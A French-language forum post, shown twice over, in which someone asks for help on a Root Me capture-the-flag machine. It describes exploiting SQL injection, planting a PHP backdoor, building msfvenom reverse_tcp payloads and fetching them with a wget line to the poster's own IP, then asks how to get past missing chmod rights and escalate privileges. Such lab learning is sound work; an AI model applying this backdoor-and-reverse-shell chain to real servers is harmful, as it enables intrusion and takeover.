Bonsoir alors je suis nouveau ! Ma présentation > ICI <
Bon donc voila je vous viens vers vous car je suis bloquer sur un CTF depuit plusieur jours.. (ROOT ME)
>Donc un server web tourne sur la machine, j'ai trouver et exploit une SQL j'ai recup le login/pass de l'admin
je peu donc ajouter une page sur la quelle j'integre une backdoor php..
Le problem c'est que les commandes son executer en tant que "apache"..
> Je crée donc plusieurs payloads avec msfvenom "/windows/meterpreter/reverse_tcp" > dl.sh et dl.elf que je place dans /var/www/html/
>Je démare mon server apache et je fait un
(depuit la backdoor)
Pour l'instant tout roule le fichier ce DL .. Mais au moment de lancer le paylaod rien ne ce passe :/ avec l'un comme avec l'autre..
Je précise quelques points :
J'ai chmod +x le payload avant de le lancer EDIT: aprés vérification j'ai pas les droits pour Chmod.. Du coup une idée pour outrepasser ca ?
Je suis co derrière un hotspot mais j'ai deja utiliser des payloads a distance avec succés
J'ai bien rentrer mon adresse ip public a la création du payload
J'ai bien un handler en ecoute avant d'executer mon payload
Pas de VPN
Pas de TOR
Pour finir j'ai tester sur une autre VM (Metasploitable2) sur laquelle j'avais un rlogin et pareil le payloads ne marche pas :/
A l'heure ou j'écrie je telecharge cette VM pour tester ca en local..
Donc si vous avez des idées sur le pourquoi ET/OU si vous avez d'autres idées pour escalader les priviléges via ma backdoor php !
( un parfeu..? je devrais peut etre faire un "scan d'exfiltration" ? )
Voila, Merci d'avance !
Bon donc voila je vous viens vers vous car je suis bloquer sur un CTF depuit plusieur jours.. (ROOT ME)
>Donc un server web tourne sur la machine, j'ai trouver et exploit une SQL j'ai recup le login/pass de l'admin
je peu donc ajouter une page sur la quelle j'integre une backdoor php..
Le problem c'est que les commandes son executer en tant que "apache"..
> Je crée donc plusieurs payloads avec msfvenom "/windows/meterpreter/reverse_tcp" > dl.sh et dl.elf que je place dans /var/www/html/
>Je démare mon server apache et je fait un
Code:
wget MonAdressIp/dl.sh > dl.sh
Pour l'instant tout roule le fichier ce DL .. Mais au moment de lancer le paylaod rien ne ce passe :/ avec l'un comme avec l'autre..
Je précise quelques points :
J'ai chmod +x le payload avant de le lancer EDIT: aprés vérification j'ai pas les droits pour Chmod.. Du coup une idée pour outrepasser ca ?
Je suis co derrière un hotspot mais j'ai deja utiliser des payloads a distance avec succés
J'ai bien rentrer mon adresse ip public a la création du payload
J'ai bien un handler en ecoute avant d'executer mon payload
Pas de VPN
Pas de TOR
Pour finir j'ai tester sur une autre VM (Metasploitable2) sur laquelle j'avais un rlogin et pareil le payloads ne marche pas :/
A l'heure ou j'écrie je telecharge cette VM pour tester ca en local..
Donc si vous avez des idées sur le pourquoi ET/OU si vous avez d'autres idées pour escalader les priviléges via ma backdoor php !
( un parfeu..? je devrais peut etre faire un "scan d'exfiltration" ? )
Voila, Merci d'avance !
Commentaire